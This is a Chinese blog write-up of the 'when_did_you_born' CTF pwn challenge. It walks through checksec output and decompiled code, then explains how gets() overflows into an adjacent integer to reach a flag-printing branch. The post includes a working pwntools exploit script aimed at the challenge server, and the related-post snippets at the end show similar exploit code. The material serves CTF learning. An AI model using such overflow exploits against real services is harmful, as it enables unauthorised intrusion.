攻防世界when_did_you_born

最新推荐文章于 2024-06-05 16:45:03 发布
最新推荐文章于 2024-06-05 16:45:03 发布
阅读量190 收藏
点赞数 1
分类专栏: ctf 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deeeelete/article/details/109651421
版权

题目:when_did_you_born

在这里插入图片描述


拖进pe查看文件详情

在这里插入图片描述
checksec查看

在这里插入图片描述
无PIE,堆栈不可执行,栈保护

运行跑一遍逻辑

在这里插入图片描述





进64位IDA调试

f5反编译main函数

在这里插入图片描述

得到源码

在这里插入图片描述

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 result; // rax@4
  __int64 v4; // rdx@9
  char v5; // [sp+0h] [bp-20h]@5
  unsigned int v6; // [sp+8h] [bp-18h]@1
  __int64 v7; // [sp+18h] [bp-8h]@1

  v7 = *MK_FP(__FS__, 40LL);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("What's Your Birth?");
  __isoc99_scanf("%d", &v6);
  while ( getchar() != 10 )
    ;
  if ( v6 == 1926 )
  {
    puts("You Cannot Born In 1926!");
    result = 0LL;
  }
  else
  {
    puts("What's Your Name?");
    gets(&v5);
    printf("You Are Born In %d\n", v6);
    if ( v6 == 1926 )
    {
      puts("You Shall Have Flag.");
      system("cat flag");
    }
    else
    {
      puts("You Are Naive.");
      puts("You Speed One Second Here.");
    }
    result = 0LL;
  }
  v4 = *MK_FP(__FS__, 40LL) ^ v7;
  return result;
}

我们看输出flag的if条件

if ( v6 == 1926 )
    {
      puts("You Shall Have Flag.");
      system("cat flag");
    }

即我们输入的v6=1926的时候会输出flag,但当我们尝试输入生日是1926的时候程序执行如下

在这里插入图片描述

说明程序其实是走了上面的代码

 if ( v6 == 1926 )
  {
    puts("You Cannot Born In 1926!");
    result = 0LL;
  }

也就是说程序既要我们的v6=1926,也不然我们的v6=1926,但可以看到的是程序中的v5却是我们可以进行手动输入的,因此我们尝试通过输入v5的的变量来覆盖v6的栈内存,从而让v6=1926


找v5和v6的变量双击进去,查看其偏移量

在这里插入图片描述
从v5的位置,不包含v5但包含v6向上数,数到v6是八个偏移,因此需要先用自己制定的payload填满这8个地址,然后向后拼接上我们输入的1926,这样一来,偏移的8个地址被挤满了之后我们输入的内容就可以顺利溢出进v6变量中了

构造脚本:

from pwn import *

p = remote('220.249.52.133',37558)
p.recvuntil("What's Your Birth?")
p.sendline('suibainshu')

payload = 'A'*8
p.recvuntil("What's Your Name?")
p.sendline(payload + p64(1926))

p.interactive()



在这里插入图片描述

Deeeelete
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF|入门题目when_did_you_born解题思路以个人总结
skyattractive的博客
05-31 735
CTF|入门题目when_did_you_born解题思路以个人总结 解题思路 拿到题目我们放入ubuntu里面通过file born(此处born是文件名) 来查看文件信息 得到信息: ELF:文件elf格式 64-bit:64位文件 LSB:文件小端序(什么是小端序个人总结会写) executable:顾名思义,可执行的文件 接下我们运行下文件./born 并过一遍文件流程 比较简单,输入生日birth 输入名字name 输出文字 将文件拖入反编译工具IDA F5 查看伪代码 得到伪代码后需要特别关
python3的pwn用法——when_did_you_born题解
Little_Small_Joze的博客
03-11 1680
检测截图 file when_did_you_born checksec when_did_you_born 我承认看到金丝雀+NX有那么一点点不开心,但是不影响。 反编译程序 根据上一步的file查看到它是64-bits的ELF文件,所以64-bits的IDA打开它,反编译找到主函数F5查看源代码。 __int64 __fastcall main(int a1, char **a2, char **a3) { __int64 result; // rax char v4[8]; // [rs
[CTF-PWN]攻防世界新手村-when_did_you_born[wp]
murongxuege的博客
09-29 617
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
攻防世界XCTF-Pwn入门11题解题报告
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-05 691
如果你也想学习:黑客&网络安全的零基础攻防教程Pwn是CTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。
when_did_you_born [XCTF-PWN]CTF writeup系列3
重新启程
12-19 426
题目地址:when_did_you_born 先检查一下保护机制 root@mypwn:/ctf/work/python# checksec 24937e95ca4744818feebe82ab96902d [*] '/ctf/work/python/24937e95ca4744818feebe82ab96902d' Arch: amd64-64-little ...
jiangzuo.rar_cloud computing java_网络攻防_防火墙
09-21
网络技术以及云计算系列讲解,包括网络攻防,防火墙技术等
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
fake_useragent.zip
08-27
在Python编程中,Fake UserAgent库是一个非常实用的工具,它允许开发者生成逼真的用户代理字符串,以模拟不同浏览器或设备访问网站。这个工具的主要作用是帮助开发人员在进行网络爬虫或者自动化测试时,避免被目标...
攻防世界 when_did_you_born
09-28 247
1.题目 2.IDA反汇编C程序 3.程序流程分析 首先输入Birth,如果Birth==1926直接退出;否则,输入Name,这时,判断Birth是否==1926.等于则get flag。 很明显,输入名字就是专门为我们提供溢出点的。两个变量的位置如下图: 0x20 - 0x18 = 0x8 也就是说name和birth之间间距8个单元。exp如下 from pwn import * #io = process('./when_did_you_born') io = remo
[PWN](攻防世界)when_did_you_born
ljh15937的博客
09-17 185
分析程序漏洞 通过 checksec 获取程序的基本信息 64位小端序 开启了Canary,使用了栈不可执行技术 使用 IDA Pro 对程序进行静态分析 需要在第二次输入名字时覆盖第一次输入的年龄 使用 GDB 动态调试程序 可以发现第二次输入的名字就在第一次输入的年龄的前面,可以轻松将其覆盖成 1926 利用程序 from pwn import * context(arch = 'amd64') context(log_level = 'DEBUG') contex
攻防世界-pwn when_did_you_born(栈覆盖)
菜的只能随便写写博客
08-10 1400
0x01 拿到文件之后,先检查文件的基本信息 文件信息 64bit elf可执行文件 无PIE保护   0x02 执行文件 文件之中有两个输入,第一个输入有回显   0x03 IDA静态分析 可以看出获取flag需要用到v5的值,首先需要v5不等于1926,进入else这个块之中,然后又需要v5等于1926才能获取flag,就产生了矛盾。 结合程序有两个输入,可以考...
cgctf when_did_you_born 栈溢出简单利用
ditto的博客
12-22 2549
拿到题目,先checksec下,看下防护措施: 没有开启PIE。 直接放到IDA里看下: 有些变量名为了方便看,我已经修改过了。图中箭头处即是溢出点。 分析下 第一次输入overflowme,如果等于1926就会退出,但是想要拿到flag,就需要overflowme的值为1926,那就很明显了,第一次输入的时候随便输个数只要不是1926就行,第二次输入v4 这个数组的时候,利用缓冲区溢出,将o...
when_did_you_born 栈溢出简单利用
zyh18851473527的博客
08-05 584
直接放到IDA里看下: 显而易见只要v5=1926,就可以看flag。但按照前面的逻辑不可以等于所以 就涉及到了溢出。gets函数溢出,这道题关键v5一开始不为1926,后面必须是1926,所以通过栈可以知道,用v4覆盖v5 下面利用缓冲区溢出,先输入v4字符串覆盖空间,然后再给v5赋值1926就好了,试试看,从ebp的偏移可以看出来v4距离v5需要覆盖8个字节 这样就得到flag啦 ...
pwn when_did_you_born
doudoudedi
06-08 512
今天被一道被一道web给虐暴了自闭中~~~~~ 所以我做到pwn来缓缓 用ida打开只要v5=1926 就可以看flag 但按照前面的逻辑不可以等于所以 就涉及到了溢出 gets()这个很普遍了吧 直接算出偏移为8 然后就上exp咯 from pwn import * p=remote('111.198.29.45',56377) payload='a'*8+p64(1926) p.recvunt...
攻防世界pwn新手练习(when_did_you_born
BurYiA的博客
09-16 573
when_did_you_born ok 多余的话就不继续累赘了昂,直接上手 程序同上次一样开了NX(堆栈不可执行)和CANNARY(栈保护)
攻防世界——pwn(1)
weixin_44319142的博客
04-08 2861
get_shell
攻防世界guess_num
08-31
攻防世界guess_num是一个题目,它要求玩家猜测一个数字并输入。根据引用的结果"cyberpeace{a6473686121bdc644837b076c3207788}",可以猜测这个题目的答案可能是"a6473686121bdc644837b076c3207788"。PIE和ASLR是一些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deeeelete

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值